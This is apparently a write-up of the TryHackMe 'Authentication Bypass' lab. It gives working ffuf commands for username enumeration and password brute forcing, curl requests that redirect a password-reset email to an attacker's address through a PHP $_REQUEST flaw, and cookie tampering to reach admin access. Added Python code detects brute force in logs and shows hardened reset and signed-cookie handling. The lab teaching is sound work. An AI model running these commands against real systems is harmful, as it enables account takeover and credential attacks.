Authentication Bypass (Write-up/Walkthrough)
Introduction
This is a relatively easy room that helps you understand some authentication bypass techniques. Feel free to ask me about anything on Twitter or LinkedIn.
The Writeup/Walkthrough
NOTE: I really recommend using the TryHackMe AttackBox so you don't run into problems deploying the tools or downloading the wordlists.
First, we need to deploy the machine and open this link: http://MACHINE_IP/customers/signup (replace MACHINE_IP with your machine's IP).
Task 2 Username Enumeration
In this task, the author mentioned a really smart technique which is:
When we try to sign up with username:admin and password:admin we get the error message "An account with this username already exists" (#ILoveErrors). This error is important because we can now try a lot of usernames, and every time we get this error it means that username is in the database. Of course we won't try them one by one; we will use AUTOMATION, aka a tool called FFUF:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists" > valid_usernames.txt
FFUF: FFUF is an acronym for "fuzz faster you fool!". In one line, ffuf is an open-source web fuzzing tool, written in Go, used to discover hidden resources. But first, what is fuzzing? It is the process of sending large numbers of generated inputs to provoke errors or unexpected output.
-w: selects the file on the computer that contains the list of usernames we are going to check for.
SecLists: SecLists is the security tester's companion. It is a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
-X: specifies the request method.
POST: ffuf sends GET requests by default, but the signup form in our example expects a POST request.
-d: specifies the data we are going to send. In our example we have the fields username, email, password, and cpassword.
username: the username field.
email: the email field.
password: the password field.
cpassword: the cpassword field.
FUZZ: in ffuf, the FUZZ keyword marks where the contents of our wordlist will be inserted in the request.
-H: adds extra headers to the request. Here we set the Content-Type so the web server knows we are sending form data.
Content-Type: application/x-www-form-urlencoded tells the web server we are sending form data.
-u: specifies the URL we are making the request to.
-mr: the text on the page we match on to confirm we have found a valid username (here "username already exists").
>: redirects the command's output into a file instead of the terminal.
valid_usernames.txt: the file the output is written into.
Now we open the file using any text editor:
nano valid_usernames.txt
Now we have the usernames. If you see any weird symbols, delete them and leave only the names, one per line, so you don't get errors in Task 3.
Task 3 Brute Force
What does brute force mean?
A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or, like in our case, a list of usernames.
Now we will try to brute force the login page using fuzzing (ffuf)
Note: When running this command, make sure the terminal is in the same directory as the valid_usernames.txt file.
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200
(Don't forget to change the IP)
This ffuf command is a little different from the previous one in Task 2. Previously we used the FUZZ keyword to select where in the request the data from the wordlist would be inserted, but because we are now using multiple wordlists, we have to define our own keywords.
W1: we have chosen W1 for our list of valid usernames.
W2: we have chosen W2 for our list of passwords.
-w: the multiple wordlists are again given with -w, each followed by :KEYWORD and separated by a comma.
-fc: filter by HTTP status code. -fc 200 hides every response that returned 200, so only the requests that produced a different status code (a successful login) are shown.
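The enumeration run in Task 2 and the brute force here both leave the same trace in the web server's access log: one source address posting many times in a short window to /customers/signup or /customers/login. As an added example (not part of the room or this write-up), here is a small Python detector run over constructed combined-format log lines; the threshold, window and sample addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format (Apache/nginx default); timestamps like 10/Oct/2023:13:55:36 +0000
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
WATCHED = {"/customers/signup", "/customers/login"}   # endpoints ffuf hammered
THRESHOLD = 20                   # this many POSTs from one IP to one endpoint ...
WINDOW = timedelta(seconds=60)   # ... inside this window raises an alert

def parse(line):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?")[0], int(m["status"])

def detect(lines):
    """Map (ip, path) -> peak POST count inside any WINDOW that reached THRESHOLD."""
    events = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3] in WATCHED:
            events[(rec[0], rec[3])].append(rec[1])
    alerts = {}
    for key, times in events.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > WINDOW:
                start += 1
            if end - start + 1 >= THRESHOLD:
                alerts[key] = max(alerts.get(key, 0), end - start + 1)
    return alerts

def sample_log():
    """Constructed sample: 25 signup POSTs in 25 s from one IP, plus two normal requests."""
    base = datetime(2023, 10, 10, 13, 55, 0)
    lines = []
    for i in range(25):
        ts = (base + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S") + " +0000"
        lines.append(f'10.10.14.5 - - [{ts}] "POST /customers/signup HTTP/1.1" 200 512')
    lines.append('10.10.14.9 - - [10/Oct/2023:13:56:00 +0000] "GET /customers/login HTTP/1.1" 200 1024')
    lines.append('10.10.14.9 - - [10/Oct/2023:13:56:05 +0000] "POST /customers/login HTTP/1.1" 302 0')
    return lines

if __name__ == "__main__":
    print(detect(sample_log()))   # {('10.10.14.5', '/customers/signup'): 25}
```

The single legitimate login POST from 10.10.14.9 never reaches the threshold, so only the enumerating address is reported.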
Task 4 Logic Flaw
We’re going to examine the Reset Password function of the Acme IT Support website (http://MACHINE_IP/customers/reset). We see a form asking for the email address associated with the account on which we wish to perform the password reset. If an invalid email is entered, you’ll receive the error message “Account not found from supplied email address”.
For demonstration purposes, we’ll use the email address robert@acmeitsupport.thm which is accepted. We’re then presented with the next stage of the form, which asks for the username associated with this login email address. If we enter robert as the username and press the Check Username button, you’ll be presented with a confirmation message that a password reset email will be sent to robert@acmeitsupport.thm.
In the second step of the reset email process, the username is submitted in a POST field to the web server, and the email address is sent in the query string request as a GET field.
curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
(Don't forget to change the IP)
-H: adds an additional header to the request. In this instance, we are setting the Content-Type to application/x-www-form-urlencoded, which lets the web server know we are sending form data so it properly understands our request.
In the application, the user account is retrieved using the query string, but later on, in the application logic, the password reset email is sent using the data found in the PHP variable $_REQUEST.
The PHP $_REQUEST variable is an array that contains data received from the query string and POST data. If the same key name is used in both the query string and the POST data, the application logic for this variable favors the POST field over the query-string one, so if we add another email parameter to the POST body, we can control where the password reset email gets delivered.
curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'
(Don't forget to change the IP)
Now we need to make an account on the website.
For the next step, you will need to create an account in the Acme IT Support customer section; doing so gives you a unique email address that can be used to create support tickets. The email address is in the format {username}@customer.acmeitsupport.thm.
Now rerun the second curl request, but with your own {username}@customer.acmeitsupport.thm address in the email field. A ticket will be created on your account containing a link that logs you in as Robert. Using Robert's account, you can view his support tickets and reveal the flag.
curl 'http://MACHINE_IP/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'
(Don't forget to change the IP)
Now sign in to the website with your own account and open the support ticket; the link inside it logs you in as Robert.
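The flaw comes down to which request variable the recipient address is read from. As an added example that is not part of the room or this write-up, the Python below models PHP's $_REQUEST merge (query string loaded first, POST keys overwriting) and replays the second curl request against a vulnerable reset handler and a hardened one that only ever mails the address the account was found by; the account table and handler messages are constructed.

```python
# Constructed customer table: email on record -> username (stands in for the DB lookup)
ACCOUNTS = {"robert@acmeitsupport.thm": "robert"}

def php_request(query, post):
    """Model PHP's $_REQUEST under the default request_order ("GP"): query-string
    keys are loaded first and POST keys with the same name overwrite them.
    Assumption: a plain dict merge, which is what the write-up's description implies."""
    merged = dict(query)
    merged.update(post)
    return merged

def reset_vulnerable(query, post, outbox):
    """Finds the account via the query string, then mails $_REQUEST['email']."""
    email = query.get("email")
    if email not in ACCOUNTS:
        return "Account not found from supplied email address"
    if post.get("username") != ACCOUNTS[email]:
        return "Username does not match"
    outbox.append(php_request(query, post)["email"])   # POST 'email' wins if present
    return "Reset email sent"

def reset_hardened(query, post, outbox):
    """Same checks, but the destination is always the address the account was found by."""
    email = query.get("email")
    if email not in ACCOUNTS:
        return "Account not found from supplied email address"
    if post.get("username") != ACCOUNTS[email]:
        return "Username does not match"
    outbox.append(email)   # never read the recipient back from the merged request
    return "Reset email sent"

def demo():
    """Replay the write-up's second curl request against both handlers."""
    query = {"email": "robert@acmeitsupport.thm"}
    post = {"username": "robert", "email": "attacker@hacker.com"}
    vuln_out, safe_out = [], []
    reset_vulnerable(query, post, vuln_out)
    reset_hardened(query, post, safe_out)
    return vuln_out, safe_out

if __name__ == "__main__":
    print(demo())   # (['attacker@hacker.com'], ['robert@acmeitsupport.thm'])
```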
Task 5 Cookie Tampering
First, we’ll start just by requesting the target page:
curl http://MACHINE_IP/cookie-test
(Don't forget to change the IP)
We can see we are returned a message of: Not Logged In
Now we’ll send another request with the logged_in cookie set to true and the admin cookie set to false:
curl -H "Cookie: logged_in=true; admin=false" http://MACHINE_IP/cookie-test
(Don't forget to change the IP)
We are given the message: Logged In As A User
Finally, we’ll send one last request setting both the logged_in and admin cookie to true:
curl -H "Cookie: logged_in=true; admin=true" http://MACHINE_IP/cookie-test
This returns the result "Logged In As An Admin" as well as a flag, which you can use to answer question one.
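The /cookie-test endpoint trusts whatever the client puts in the logged_in and admin cookies. As an added example, not code from the room or this write-up, the Python below reproduces that plaintext trust model next to a hardened version that keeps the same flags in a single HMAC-signed session cookie, so a client that edits the admin flag without the server secret is treated as not logged in; the secret and the cookie layout are assumptions.

```python
import base64, hashlib, hmac, json

def parse_cookie_header(header):
    """Split a 'k=v; k2=v2' Cookie header into a dict (a value may itself contain '=')."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            out[k] = v
    return out

def role_from_plain_cookies(header):
    """The trust model /cookie-test exposes: the client's flags are believed as sent."""
    c = parse_cookie_header(header)
    if c.get("logged_in") != "true":
        return "Not Logged In"
    return "Logged In As An Admin" if c.get("admin") == "true" else "Logged In As A User"

SECRET = b"constructed-server-side-secret"   # assumption: known only to the server

def sign_session(data):
    """Server issues one cookie: base64(JSON payload) + '.' + HMAC-SHA256 tag."""
    payload = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()
    tag = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"

def verify_session(value):
    """Return the session dict, or None when the tag does not match the payload."""
    payload, sep, tag = value.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    return json.loads(base64.urlsafe_b64decode(payload))

def role_from_signed_cookie(header):
    """Hardened endpoint: only a payload carrying a valid tag is trusted."""
    session = verify_session(parse_cookie_header(header).get("session", ""))
    if not session or not session.get("logged_in"):
        return "Not Logged In"
    return "Logged In As An Admin" if session.get("admin") else "Logged In As A User"

def edit_payload_without_key(cookie, **changes):
    """Test helper: alter the payload but keep the old tag, as a client lacking SECRET must."""
    payload, _, tag = cookie.rpartition(".")
    data = json.loads(base64.urlsafe_b64decode(payload))
    data.update(changes)
    new_payload = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()
    return f"{new_payload}.{tag}"
```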
We will use this website to look up (reverse) MD5 hashes.
We will use this website to decode/encode base64.
/etc/takeaways
I learned more about ffuf, curl, encryption/decryption, and authentication bypass techniques